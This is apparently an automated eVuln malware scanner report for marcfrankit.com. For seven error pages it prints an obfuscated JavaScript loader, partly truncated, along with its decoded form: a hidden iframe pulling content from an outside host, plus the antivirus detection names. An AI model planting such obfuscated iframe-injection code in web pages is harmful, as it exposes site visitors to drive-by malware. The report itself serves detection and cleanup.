Malware Scanner report for marcfrankit.com

Malicious/Suspicious/Total urls checked: 7/0/13

7 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/7/7

7 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://marcfrankit.com/	200 OK Content-Length: 4137 Content-Type: text/html	clean
http://marcfrankit.com/index.php	200 OK Content-Length: 4137 Content-Type: text/html	clean
http://marcfrankit.com/index2.php?id=VjFod1MxUXlUa2hWYTJoUVYwZE5PUT09	200 OK Content-Length: 4323 Content-Type: text/html	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js	200 OK Content-Length: 72174 Content-Type: text/javascript	clean
http://marcfrankit.com/index2.php?id=VjJ0V2ExWXlSa2RoTTJ4b1UwVktjRmxzWkZOT2JHeFhZVVpPYVZJd05IcFZSbEYzVUZFOVBRPT0=	200 OK Content-Length: 3979 Content-Type: text/html	clean
http://marcfrankit.com/index2.php?id=VmpGU1NrNVhVbGhWYTJoVFlsaENjbFZXVVhkUFVUMDk=	200 OK Content-Length: 6286 Content-Type: text/html	clean
http://marcfrankit.com/test404page.js	404 Not Found Content-Length: 2542 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.teachertube.com	404 Not Found Content-Length: 2547 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.sharemylesson.com	404 Not Found Content-Length: 2549 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.teachers.net	404 Not Found Content-Length: 2544 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.thecornerstoneforteachers.com	404 Not Found Content-Length: 2561 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.middleschoolscience.com	404 Not Found Content-Length: 2555 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
http://marcfrankit.com/www.sciencespot.net	404 Not Found Content-Length: 2547 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function c41687154048m490858140e85c(m490858140efb6){ var m490858140f38a=16; return (parseInt(m490858140efb6,m490858140f38a));}function m490858140ffb2(m4908581410d52){ function m4908581411ebc(){var m4908581412656=2;return m4908581412656;} var m49085814112eb='';m4908581413318=String.fromCharCode;for(m4908581411a90=0;m4908581411a90<m4908581410d52.length;m4908581411a90+=m4908581411ebc()){ m49085814112eb+=(m4908581413318(c41687154048m490858140e85c(m4908581410d52.substr(m4908581411a90,m4908581411eb ... 1157 bytes are skipped ...253637'+z81+'2536382537'+z81+'342533642533352533362533332532302537'+z81+'332537'+z81+'342537'+z81+'39253663253635253364253237'+z81+'2536342536392537'+z81+'332537'+z81+'302536632536312537'+z81+'39253361253230253665253666253665253635253237'+z81+'2533652533632532662536392536362537'+z81+'3225363125366425363525336527'+z81+'29293B7'+z81+'D7'+z81+'6617'+z81+'2206D7'+z81+'969613D7'+z81+'47'+z81+'27'+z81+'5653B3C2F7'+z81+'3637'+z81+'2697'+z81+'07'+z81+'43E';document.write(m490858140ffb2(m4908581413a3b)); Decoded script: <iframe name=c4 src='http://bugzilla.highlevel.biz/forum/Lasna?'+Math.round(Math.random()*117667)+'5' width=209 height=563 style='display: none'></iframe> Antivirus reports: Microsoft Exploit:HTML/IframeRef.CQ NANO-Antivirus Trojan.Url.IframeB.vfvwf Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: marcfrankit.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Mar 2015 20:10:17 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4137
Content-Type: text/html

...4137 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: marcfrankit.com
Referer: http://www.google.com/search?q=marcfrankit.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=marcfrankit.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://marcfrankit.com/

Result: marcfrankit.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for marcfrankit.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools